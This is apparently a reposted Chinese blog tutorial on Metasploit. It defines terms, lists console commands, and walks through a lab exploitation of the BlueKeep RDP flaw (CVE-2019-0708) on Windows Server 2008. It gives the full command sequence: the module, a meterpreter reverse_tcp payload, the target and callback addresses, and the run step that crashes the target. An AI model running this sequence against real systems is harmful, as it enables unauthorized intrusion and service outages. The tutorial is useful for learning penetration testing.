zoukankan      html  css  js  c++  java
  • 工具使用——Metasploit使用

    0X01工具简介:

    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带许多个已知软件漏洞的专业级漏洞攻击工具,简单可以理解为是一个漏洞利用平台。

    0X02常用术语:

    渗透攻击(exploit):

    测试者利用系统、程序或服务的漏洞进行攻击的一个过程。

    攻击载荷(payload):

    攻击者在目标系统上执行的一段攻击代码,该代码具有反弹连接,创建用户,执行其他系统命令的功能。

    Shellcode:

    在目标主机上运行的一段机器指令,成功执行后会返回一个shell。

    模块(module):

    是指metasploit框架中所使用的一段软件代码组件。

    监听器(listener)

    监听器是metasploit中用来等待介入网络连接的组件。

    0X03工具启动:

    Kali-linux终端下:

    Msfconsole

    可以看到它收纳的漏洞利用模块、攻击载荷、扫描模块等。

     0X04常用参数:

    Msfconsole:启动
    
    Show exploit:显示所有渗透攻击模块
    
    Show payloads:显示所有辅助攻击模块
    
    Search name:查找模块
    
    Info:显示模块的相关信息
    
    RHOST:目标主机
    
    LHOST:目标主机链接IP地址
    
    Use name:使用模块
    
    Show options:显示模块的所有参数配置
    
    Show targets:显示目标系统
    
    Set target:指定目标系统的系统
    
    Set payload:指定使用的攻击载荷
    
    Exploit:开始攻击
    
    Sysinfo:显示被控制主机的系统信息
    
    Shell:运行交互shell
    

    0X05:使用案例:

    使用环境:

    攻击机:kali-linux(172.17.1.58)

     靶  机:windows server2008(172.17.1.62)

    漏  洞:远程桌面代码执行漏洞(cve-2019-0708)

    启动metasploit:

    msfconsole
    

    搜索漏洞利用模块:

    search cve-2019-0708
    

    使用攻击模块:

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    

    显示攻击载荷:

    show payloads
    

    指定攻击载荷:

    set payload windows/x64/meterpreter/reverse_tcp
    

    显示所有参数配置:

    show options
    

    设置目标主机:

    set RHOSTS 172.17.1.62
    

    设置反弹地址:

    set LHOST 172.17.1.58
    

    显示目标系统:

    show targets
    

    指定目标系统(vmware 15):

    set target 4
    

     

    开始攻击:

    run
    

     Windows server 2008宕机重启:

  • 相关阅读:
    ios界面布局整理
    android ProGuard 代码混淆实现
    mac版 android破解软件下载安装
    在unix系统下的 .o文件 .a文件 .so文件说明和相互关系
    android中的广播接收实现总结
    用java的jdk 生成android 的jni接口文档
    Android 自定义Application
    android项目中配置NDK自动编译生成so文件
    创建android Notification
    (ios) nsnotification总结
  • 原文地址:https://www.cnblogs.com/cowherd/p/13320911.html
Copyright © 2011-2022 走看看